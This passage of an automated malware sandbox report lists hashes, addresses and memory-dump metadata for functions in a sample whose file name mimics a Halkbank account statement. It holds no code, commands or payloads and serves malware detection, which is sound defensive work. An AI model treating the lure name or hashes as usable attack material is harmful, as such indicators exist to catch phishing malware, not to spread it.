Opcode ID: 57fa039d0569ec18d9c61be2e0a41ee8fa72189e82b118c23f082a77dfe35e4e
Instruction ID: 378a8a1f4ede788aa85a8139504d7995ebc9dff74acdf27571daa51c557cedf1
Opcode Fuzzy Hash: 57fa039d0569ec18d9c61be2e0a41ee8fa72189e82b118c23f082a77dfe35e4e
Instruction Fuzzy Hash: E7112771608214DFEF18CFA8CA40BE8BBB6FF80358F1540AAD481D7291D7B0DA80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5ED0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02660005bdb939d1e134e239f36ec00811de4c1488c16f5cdaa9898a546e69c8
Instruction ID: adb512953376c04296c10c7547b5db9e0d154f6aa46c9e2ef49a04d8aedbf68a
Opcode Fuzzy Hash: 02660005bdb939d1e134e239f36ec00811de4c1488c16f5cdaa9898a546e69c8
Instruction Fuzzy Hash: 2D014436705200CFE724DA59F884AA6F3E6F788335B14852FE55FC7641EAB2A8058750

Uniqueness

Uniqueness Score: -1.00%

Function 05DB60D0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687cd1ca125d87230d4a03af12934a10c20f537068aa5c3e77a5aafbd2378264
Instruction ID: 96607a10e463cc4d2df154d67d268b52af149972514675a2612f8cfb12ffbf14
Opcode Fuzzy Hash: 687cd1ca125d87230d4a03af12934a10c20f537068aa5c3e77a5aafbd2378264
Instruction Fuzzy Hash: 5101DD36305100DBEB14D6A5FC50BA9B3D7F7C46A9B10443BE24FC7A45CA62DC02C761

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F560 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7282e0d71f3526a4aa2d8eb28fc0c4c6a8bd2375db68f925c511e898ec2605
Instruction ID: f66dc4d3d92cc60afae083d3453738b3f303b840460b39aba38de70ec2d01a73
Opcode Fuzzy Hash: ae7282e0d71f3526a4aa2d8eb28fc0c4c6a8bd2375db68f925c511e898ec2605
Instruction Fuzzy Hash: A511E5B8E4014A8FDF10CBB8E8405BE7BB1EB46318F102A65D112EB2A1DB3159058B90

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA541 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30aefdc5d3489822f4353046a18260414eaab6fdac9ee55a084b4bd8ec45fe58
Instruction ID: 2a2756a44cb77b04f28941dc1128db25ff406310120cbdcfbad2075e79d3392c
Opcode Fuzzy Hash: 30aefdc5d3489822f4353046a18260414eaab6fdac9ee55a084b4bd8ec45fe58
Instruction Fuzzy Hash: 87114CB1E04219DFEB14CBA9C8447EEBBF7BB49310F54451BE087E6240E3B49A81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05DB43B0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e546011da548c162370153d5c61b0fec56fb8e8fbcc185bdfcb086476475866
Instruction ID: c6e0438b2f4dbe7ad39edc055f34a2ac378d7bfb397990c3b20f13652e84017d
Opcode Fuzzy Hash: 1e546011da548c162370153d5c61b0fec56fb8e8fbcc185bdfcb086476475866
Instruction Fuzzy Hash: B711E330704340CBCB26EF29AC545BE7BA3FB851157140A3AD097CB662DFB5984A9353

Uniqueness

Uniqueness Score: -1.00%

Function 00E606A9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ee4fdb347dad6d472be30789be9dec2e8ea1894c94990c7693d878dee67066
Instruction ID: f0e6b1dbe540be4ff07b166998f630044b763e5f94893fbb10bcacd86ad4cc64
Opcode Fuzzy Hash: 28ee4fdb347dad6d472be30789be9dec2e8ea1894c94990c7693d878dee67066
Instruction Fuzzy Hash: 9C211A78E00209DFCB40DFA8D854A9EBBB1FF8A305F1145A5D505AB2B5DB306E45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05DB1288 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c703a5a730d82ed05ecd1184081760ada4170ef5fa82a168b11553dca39f68fb
Instruction ID: bfb0f929b146dbdb7d897a1146f66a87f66e8f636f765ddddfc8fe8ca41418b9
Opcode Fuzzy Hash: c703a5a730d82ed05ecd1184081760ada4170ef5fa82a168b11553dca39f68fb
Instruction Fuzzy Hash: E911A1B1608204CFEB08DBE9CC61AB577E7AF86214F0140ABE487CB275DAA0DC00C752

Uniqueness

Uniqueness Score: -1.00%

Function 05DB4DA8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569ab808c109e6ae21c7f6deaffd7120a3cb4b0ca302b8bd549a1e5b2d383896
Instruction ID: bf076798e15711406e27605233a1a8d1d8aa7b37345b0a777ed5891fb7635069
Opcode Fuzzy Hash: 569ab808c109e6ae21c7f6deaffd7120a3cb4b0ca302b8bd549a1e5b2d383896
Instruction Fuzzy Hash: DF114C70208754CFE725CB68D854F62BBE7BF49304F11098EE4C78BAA2DAA1EC04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA550 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d884c411e9095c7e8eae129de07094a49f0fd948fb11396ccef401b62d5561
Instruction ID: 8e37ed27d5524f7b7588af623c199a99eba95b9ee333557b2b86812186249c53
Opcode Fuzzy Hash: b0d884c411e9095c7e8eae129de07094a49f0fd948fb11396ccef401b62d5561
Instruction Fuzzy Hash: D01107B0E04659DFEB15CBA9C4447EEBBF7BB49310F54455BE087E6240E7B4AA80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05E9A870 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7128de6bb36101274d776f6dd6ff0711314453b40b9dc1d4fbf315dd8094e57
Instruction ID: d2549d38220d29bd43fc518cc6ae6f90e2744580c816d00bf52dc0a3c2dfec1d
Opcode Fuzzy Hash: d7128de6bb36101274d776f6dd6ff0711314453b40b9dc1d4fbf315dd8094e57
Instruction Fuzzy Hash: D401B5366082585FEB29DA98D444ADAFBF9EF55321F1480FBE488C7250D631D981C750

Uniqueness

Uniqueness Score: -1.00%

Function 05DA2374 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d37c44905e40e00e89a4fdee17fc0b2917c0593cd14fe6efed34c2513aae3c4
Instruction ID: 9695a348565006452316e8c3c1850510be5dde17e510b7f3ff5d99231e0b47c1
Opcode Fuzzy Hash: 8d37c44905e40e00e89a4fdee17fc0b2917c0593cd14fe6efed34c2513aae3c4
Instruction Fuzzy Hash: 0711E3799002199BCB11DB99C450AAEBBF6EFC6300F14849EE956AB345CB32DC02DB51

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA619 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbfb4311d722422f63ca9d54070027d1bb1ddeef5a72f40db67bb0061800fd68
Instruction ID: 8fe4ef5aa11ac2f0ddc551a55421c24f9e1b85b64ce66833d5e6ce22f67f9d86
Opcode Fuzzy Hash: bbfb4311d722422f63ca9d54070027d1bb1ddeef5a72f40db67bb0061800fd68
Instruction Fuzzy Hash: 99116171A04614EFD750DBA8DC446AEB7FBFB49204B10486BD597C7300DB71E906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E171 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710728479caf1b0123fcc7d7fa8d41e33c281f2abb47dbc1cc8312dc98dac7df
Instruction ID: d4058191122724644011f153a3d4192abe04bfd485983f655dc3a6a38a1c21bc
Opcode Fuzzy Hash: 710728479caf1b0123fcc7d7fa8d41e33c281f2abb47dbc1cc8312dc98dac7df
Instruction Fuzzy Hash: 7A016D703057505BE3249B78D880B4EBBA6BFD2254F05492DE6468F340DFB49E0587E5

Uniqueness

Uniqueness Score: -1.00%

Function 05DA037D Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ae768779adfdc3efa3e861f4362991d5a61eea52765d60fce9d6bf0979d960
Instruction ID: 353ceb086ecc8f095685dc59545e5cee7c9445003ed3619cac8d8e1e5ac8c040
Opcode Fuzzy Hash: 12ae768779adfdc3efa3e861f4362991d5a61eea52765d60fce9d6bf0979d960
Instruction Fuzzy Hash: 6901F933B093518FD72656668C18A377BABFFC3669B1800ABD486C7241DA61C805C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 05DB33C4 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdd08b6a2a57cb988990c2f9f4c5c04227edc1bcf18c1331d52d55652670461
Instruction ID: d45a58a12841ad15f9574119c3073f981da050ad368c57b8024d84364e881799
Opcode Fuzzy Hash: acdd08b6a2a57cb988990c2f9f4c5c04227edc1bcf18c1331d52d55652670461
Instruction Fuzzy Hash: 06019B71648254DBE754E654F854BEE7AF7BB44214F40064BD1838B780EAE2E8424756

Uniqueness

Uniqueness Score: -1.00%

Function 05DB33A8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd077e725411f744d998e056340a2e04db42c096a8f05c74364bf0d906fcf89
Instruction ID: 257212f29ad3a4e9af92573d5291a33f4994b599b26cf0ac2156aee76142b285
Opcode Fuzzy Hash: afd077e725411f744d998e056340a2e04db42c096a8f05c74364bf0d906fcf89
Instruction Fuzzy Hash: 46113970244714CFDB24CAA8D950EA2B7E7BF88614F10094EE1C78BB92DAA2FC048B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E60608 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2547c7843d132b886cef886fef34614cedb37abec68a22bb3a18e886278e90
Instruction ID: 2de461184c40d12e05ff14c91cc94edd174fe1f523388a64d4c0437ff95acf27
Opcode Fuzzy Hash: fa2547c7843d132b886cef886fef34614cedb37abec68a22bb3a18e886278e90
Instruction Fuzzy Hash: 9F114830902248DFCB29EFB4D650A9D7BB2EF86208F2019BDC40167795CB368E4ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 05E99660 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ebea026519dc6cb6ecc4a359ebdfd6a85e898da0ff111c90fd24d7ea617c65
Instruction ID: 539edff7a7a0f8fcd2640abec548951cc4d16e65e57c7d5adbc146c37c028aa8
Opcode Fuzzy Hash: 05ebea026519dc6cb6ecc4a359ebdfd6a85e898da0ff111c90fd24d7ea617c65
Instruction Fuzzy Hash: D8018436340214AFDB148F59DC94FEA77A9FB89720F10802AFA04CB291C6B2D8008750

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA5D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9a51d14414491b165c49a6e9744d9103bfd57672a2f1e3c8481fa5e14cd76a
Instruction ID: ef6c9a23c298aa6c76339186f29bb3b65996d3322e03cfdb4ae839536229e8c8
Opcode Fuzzy Hash: 2f9a51d14414491b165c49a6e9744d9103bfd57672a2f1e3c8481fa5e14cd76a
Instruction Fuzzy Hash: 57117C70A08659DFFB21CBA1D8043EEBBE7BB85311F54444BE08396180DBB4EA90CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05DB43C0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343a41ca14a44956d94e4ba5e5efc6d7248dd07180c35c54f0e2873da4aa2f9a
Instruction ID: a6dfbd0d231570495ab737f8c02ba8232e503def9a604abd70280dc5a0b8e511
Opcode Fuzzy Hash: 343a41ca14a44956d94e4ba5e5efc6d7248dd07180c35c54f0e2873da4aa2f9a
Instruction Fuzzy Hash: E801C430704200CBCB25DF2A9C544BEBBA7FBC4116314093AE087C7716DFB5995A9793

Uniqueness

Uniqueness Score: -1.00%

Function 05E96FB8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e41cdee0a043aa10a0868e46fb1e816a3b0365436c557f14b4c6fae18be8e24
Instruction ID: 03753a133022217b0e174ad13b7e390053e00491eac03e59a0ddf72d641a9bf8
Opcode Fuzzy Hash: 4e41cdee0a043aa10a0868e46fb1e816a3b0365436c557f14b4c6fae18be8e24
Instruction Fuzzy Hash: 6D11CE70A14309CBDB18DF60C4147EF7AE3EB46304F241469D082A7380EFB64D49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05E97251 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f4860d19043206ddc92695df6b4b1d793dc49566693361d3fc6507a96d9264
Instruction ID: 0774a936a59bf61f8cb74ee86f6d8d4abe11ae0557621097e606b497973d5f49
Opcode Fuzzy Hash: 77f4860d19043206ddc92695df6b4b1d793dc49566693361d3fc6507a96d9264
Instruction Fuzzy Hash: 63119A70E20108CBCF08CB94C844AEDF7F2FB49304F106469E446BB250DB359D48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05DBD4EF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9b41fa542cee33fa4d95e8a912adb6b25de7456505a106346701199f6a111e
Instruction ID: 52f41853cabb73e400697168f1e8fe83a1e780ed617316f1327ebf76353908db
Opcode Fuzzy Hash: 5e9b41fa542cee33fa4d95e8a912adb6b25de7456505a106346701199f6a111e
Instruction Fuzzy Hash: 0301F97520D216DBFA29F615AC107FE32D7AB83118F44447780878F208D5E1EA0687A3

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F4D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9007fccb3d2b840b5a8d51059f45caad79e45f4e14c758ccf4418515a7db1f0
Instruction ID: b5c2c03ad4e64d2bcc8dfd7119202c92aa0a375db1d1d1cd2439acd0a6b44fc4
Opcode Fuzzy Hash: c9007fccb3d2b840b5a8d51059f45caad79e45f4e14c758ccf4418515a7db1f0
Instruction Fuzzy Hash: EC0171753000048FC754EBA9E494AAE77EAFFC8355B104878E247CB765DF21CC459B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E606B8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64528711acd23915279ded8ba829fadbeb5b0c3648da90c96e2b206669db51d4
Instruction ID: 97443e0f96c58a4e2e118bae4a4c607884a9db5c1434c5bc41a60ad11d9e3bd9
Opcode Fuzzy Hash: 64528711acd23915279ded8ba829fadbeb5b0c3648da90c96e2b206669db51d4
Instruction Fuzzy Hash: 5C110A78E00109DFCB44DFA8D854A9EBBB1FF89304F104565D505A7364DB306E46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E6FF60 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad9a64b9049a6712a2636f4ef52a35fb57015c8ba5d85eae938f9c013f4c459
Instruction ID: a97e20669908eb175f11fe919a84daa1648f0b46ed08bcfd184d5adbc68dbd83
Opcode Fuzzy Hash: aad9a64b9049a6712a2636f4ef52a35fb57015c8ba5d85eae938f9c013f4c459
Instruction Fuzzy Hash: AF018172389210CB8729562974546AAB69BEBDA3D8334507ED40BD7394DE72CC029391

Uniqueness

Uniqueness Score: -1.00%

Function 00E6FF50 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68de4a3bb732487f6a3a718f920b1c34d533b84412ac796f1e00145602954ce5
Instruction ID: c8fd5107031907f8d25ad1fe33d7a4b21bf10b922dcec5191e5d5f86ce1564c4
Opcode Fuzzy Hash: 68de4a3bb732487f6a3a718f920b1c34d533b84412ac796f1e00145602954ce5
Instruction Fuzzy Hash: BF018F3134D210CFC7251724B4542A6BBA6ABCB3D832420BFD44ADB291DA768C06D351

Uniqueness

Uniqueness Score: -1.00%

Function 05E940F8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1612f058435dfee4c1d551a786443676c491ce26f0b3a52c25d76685c664f13
Instruction ID: 0c62d29dad09c57ca4279da12ab66d491184e4a6714be1f446cc719d04dcd67e
Opcode Fuzzy Hash: c1612f058435dfee4c1d551a786443676c491ce26f0b3a52c25d76685c664f13
Instruction Fuzzy Hash: FC0181753093048B9F2DD66A48542BA76EBBBE5155724603E848BC73D1FDB1CC038351

Uniqueness

Uniqueness Score: -1.00%

Function 05DA1505 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a26d175a7adffbf466cb2d6be757ef3475d591cb1a179bcea56d1e3782f857
Instruction ID: 15d80fd5148bb6d29fd418e79d7c2eaa73811e4c530735eb0045a2a2f43d877c
Opcode Fuzzy Hash: d6a26d175a7adffbf466cb2d6be757ef3475d591cb1a179bcea56d1e3782f857
Instruction Fuzzy Hash: 5A11AD32D003098BEB14DBA8C845BEEBBF2EF89310F14856AD442BB251DB719944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA628 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb25f4d22985269122b2789581f9e64da526a6a4953ca2a9ecf830e88f32fdb
Instruction ID: e6349e7b47ecc5d28719c679cac93147ee921ab77fe2e3cedd6ecae8b99ef76f
Opcode Fuzzy Hash: 2eb25f4d22985269122b2789581f9e64da526a6a4953ca2a9ecf830e88f32fdb
Instruction Fuzzy Hash: 4C014C71A04614EFD754DB69DC449AEB7FBFB89204700486BD597D7200DBB1E902CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05DB8BA5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb95e75859e1b49e8fcaa03df29a3ce8f1175a1c5140b9369a87f8f522e03a4
Instruction ID: f53685d0a0c0b7b2dbdde470a36bb0f3a2a46014b84ea2690fcd34b34c72820d
Opcode Fuzzy Hash: 6cb95e75859e1b49e8fcaa03df29a3ce8f1175a1c5140b9369a87f8f522e03a4
Instruction Fuzzy Hash: BF115B71B10218CBDB15EFA898642EDBAB7FB88705F10406ED44BAB342CFB949059F81

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F688 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc126e6bb4c2ff416a91a30b538c10e167ae97188a195bff55cd749dab2c091
Instruction ID: f073bccd961c45d152af0fc9b209aa63fe913cf98782095cfe26a3832fc17352
Opcode Fuzzy Hash: 6bc126e6bb4c2ff416a91a30b538c10e167ae97188a195bff55cd749dab2c091
Instruction Fuzzy Hash: 13012635708114AF8714AAA9E410AAE7BABEFC5794B24C03DE909CF364CE31DC1287D1

Uniqueness

Uniqueness Score: -1.00%

Function 05E99631 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6bb5bb2a70187313ef79e726146b1051ce34b09e566207a15cdb999db08263
Instruction ID: 019571ae1b75bf3a9abc62453a39967494e91aff10a14b6041709ebf41172062
Opcode Fuzzy Hash: 5c6bb5bb2a70187313ef79e726146b1051ce34b09e566207a15cdb999db08263
Instruction Fuzzy Hash: F40181727043419FCB059F69D884C9E7BB5FF8632031140AAF945CB263CA75DC04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 05DBBBC1 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
